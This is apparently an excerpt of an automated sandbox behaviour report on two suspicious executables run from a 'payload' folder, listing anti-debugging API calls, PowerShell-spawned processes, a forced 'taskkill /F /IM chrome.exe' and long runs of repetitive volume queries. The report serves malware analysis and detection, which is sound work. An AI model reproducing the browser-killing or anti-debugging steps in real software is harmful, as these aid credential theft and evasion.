Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug

Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Code function: 6_2_00007FF7E531A614 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	6_2_00007FF7E531A614
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Code function: 6_2_00007FF7E530C8A0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	6_2_00007FF7E530C8A0
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Code function: 6_2_00007FF7E530D30C SetUnhandledExceptionFilter,	6_2_00007FF7E530D30C
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Code function: 6_2_00007FF7E530D12C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	6_2_00007FF7E530D12C
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Code function: 12_2_00007FFD8A252A70 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	12_2_00007FFD8A252A70
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Code function: 12_2_00007FFD8A253028 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	12_2_00007FFD8A253028
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe	Code function: 32_2_00007FF78C9BBE00 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	32_2_00007FF78C9BBE00
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe	Code function: 32_2_00007FF78C9BC69C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	32_2_00007FF78C9BC69C
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe	Code function: 32_2_00007FF78C9BC840 SetUnhandledExceptionFilter,	32_2_00007FF78C9BC840
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe	Code function: 32_2_00007FF78C9CB4F8 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	32_2_00007FF78C9CB4F8
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe	Code function: 34_2_00007FFD8A19F674 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	34_2_00007FFD8A19F674
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe	Code function: 34_2_00007FFD8A19F85C SetUnhandledExceptionFilter,	34_2_00007FFD8A19F85C
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe	Code function: 34_2_00007FFD8A19E55C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	34_2_00007FFD8A19E55C

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\Documents\gogjothegoat\payload\zed.exe "C:\Users\user\Documents\gogjothegoat\payload\zed.exe"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe "C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe"	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Process created: C:\Users\user\Documents\gogjothegoat\payload\zed.exe "C:\Users\user\Documents\gogjothegoat\payload\zed.exe"	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Process created: C:\Users\user\Documents\gogjothegoat\payload\zed.exe C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe	Process created: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe "C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe"

Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe

Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM chrome.exe

Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe

Code function: 34_2_00007FFD8A197CD0 PyArg_ParseTuple,PyExc_TypeError,PyErr_SetString,GetSecurityDescriptorDacl,free,SetSecurityDescriptorDacl,GetSecurityDescriptorOwner,free,GetSecurityDescriptorGroup,free,free,free,

34_2_00007FFD8A197CD0

Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe

Code function: 34_2_00007FFD8A198B50 _PyArg_ParseTuple_SizeT,PyErr_Clear,_PyArg_ParseTuple_SizeT,PyErr_Clear,_PyArg_ParseTuple_SizeT,PySequence_Check,PyExc_TypeError,PyErr_SetString,PySequence_Size,PySequence_Tuple,_PyArg_ParseTuple_SizeT,_Py_Dealloc,AllocateAndInitializeSid,PyExc_ValueError,PyErr_SetString,_Py_NewReference,malloc,memset,memcpy,

34_2_00007FFD8A198B50

Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe

Code function: 6_2_00007FF7E5329570 cpuid

6_2_00007FF7E5329570

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression.FileSystem\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.FileSystem.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
